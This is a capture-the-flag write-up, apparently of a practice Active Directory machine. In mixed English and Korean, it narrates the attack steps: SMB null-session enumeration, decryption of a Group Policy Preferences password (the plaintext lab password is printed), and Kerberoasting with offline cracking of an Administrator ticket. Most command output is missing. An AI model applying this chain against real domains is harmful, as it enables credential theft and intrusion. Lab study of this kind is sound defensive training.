Overview
This machine is an easy Active Directory machine that involves exploiting SMB null sessions, GPP vulnerability, and Kerberoasting.
Recon & Enummeration
First, I performed a fast SYN scan using nmap with the --min-rate 3000 flag.
This revealed common Active Directory ports like LDAP and Kerberos, suggesting the target is an Active Directory machine.

Nmap done: 1 IP address (1 host up) scanned in 1.08 secondsNext, I performed a detail scan using the -sCV flags.
I got the domain name as active.htb, and added it to /etc/hosts file.

The result indicated that the null sesison had read permissions on the Replication share.

I accessed the Replication share using the null session and downloaded all files using mget.

</Groups>GPP는 Group Policy Preferences의 약자로, 마이크로소프트의 Active Directory (AD) 환경에서 관리자가 도메인에 연결된 사용자나 컴퓨터의 다양한 설정을 중앙 집중식으로 관리하고 배포할 수 있도록 설계된 기능이다.
하지만 서비스 계정의 비밀번호를 XML 파일에 암호화 된 형태로 관리하고 모든 시스템에서 동일한 암호화 키가 외부에 노출된 적이 있기 때문에 쉽게 복호화가 가능한 취약점이 있다.
I successfully decrypted that password using the gpp-decryption tool, and got plain password: GPPstillStandingStrong2k18.

GPPstillStandingStrong2k18Using this credential, I was able to access the User share and discovered user.txt within the Desktop folder.
Privilege Escalation
Furthemore, I utilized the acquired credential to perform Kerberoasting, successfully obtaining an Administrator's TGS ticket.

I then cracked the TGS ticket hash using John the Ripper and the wordlist rockyou.txt.

Finally, I obtained the Administrator's plaintext password and used it to retrieve root.txt from the Administrator's Desktop folder.
